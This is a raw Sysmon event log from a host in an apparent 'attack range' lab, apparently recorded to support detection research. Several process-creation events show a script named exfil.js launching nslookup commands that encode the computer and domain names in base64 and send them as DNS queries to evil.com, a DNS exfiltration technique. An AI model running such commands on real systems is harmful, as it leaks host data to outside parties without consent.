14:16:25.483{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B9-629A-B83F-000000005F02}7756C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198631Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.483{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17B9-629A-B73F-000000005F02}2604C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198630Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.483{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198629Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.483{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198628Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.483{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198627Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.483{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198626Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.483{2E1864BB-17A1-629A-783D-000000005F02}55521240C:\Windows\System32\WScript.exe{2E1864BB-17B9-629A-B73F-000000005F02}2604C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198625Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.487{2E1864BB-17B9-629A-B73F-000000005F02}2604C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluOiBhdHRhY2tyYW5nZS5sb2NhbA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmfabw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000198624Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.483{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljbgi.tmpMD5=13DAE9C9CF6ADD4F8F46BEAD8C3CC212,SHA256=2DEC16DD493989E01C6A3048EE3C7ECCED532832FC7BFFA4BF3297D9C89C0784,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000198623Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.450{2E1864BB-17B9-629A-B53F-000000005F02}57007712C:\Windows\system32\conhost.exe{2E1864BB-17B9-629A-B63F-000000005F02}7744C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198622Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.450{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198621Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.450{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198620Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.450{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198619Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.450{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198618Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.450{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B9-629A-B63F-000000005F02}7744C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198617Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.450{2E1864BB-17B9-629A-B43F-000000005F02}17361372C:\Windows\system32\cmd.exe{2E1864BB-17B9-629A-B63F-000000005F02}7744C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198616Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.450{2E1864BB-17B9-629A-B63F-000000005F02}7744C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtQ1QtQVRUQUM= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17B9-629A-B43F-000000005F02}1736C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtQ1QtQVRUQUM= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljbgi.tmp 2>&1 10341000x8000000000000000198615Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.418{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17B9-629A-B53F-000000005F02}5700C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198614Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.418{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17B9-629A-B53F-000000005F02}5700C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198613Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.403{2E1864BB-17B9-629A-B53F-000000005F02}57007712C:\Windows\system32\conhost.exe{2E1864BB-17B9-629A-B43F-000000005F02}1736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198612Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.381{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B9-629A-B53F-000000005F02}5700C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198611Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.366{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198610Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.366{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198609Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.366{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198608Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.366{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198607Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.366{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17B9-629A-B43F-000000005F02}1736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000198606Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.366{2E1864BB-17A1-629A-783D-000000005F02}55527212C:\Windows\System32\WScript.exe{2E1864BB-17B9-629A-B43F-000000005F02}1736C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000198605Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.374{2E1864BB-17B9-629A-B43F-000000005F02}1736C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Q29tcHV0ZXJOYW1lOiBXSU4tREMtQ1QtQVRUQUM= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljbgi.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 10341000x8000000000000000198604Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.349{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198603Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:25.349{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-1722-629A-AA38-000000005F02}7028C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000198602Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 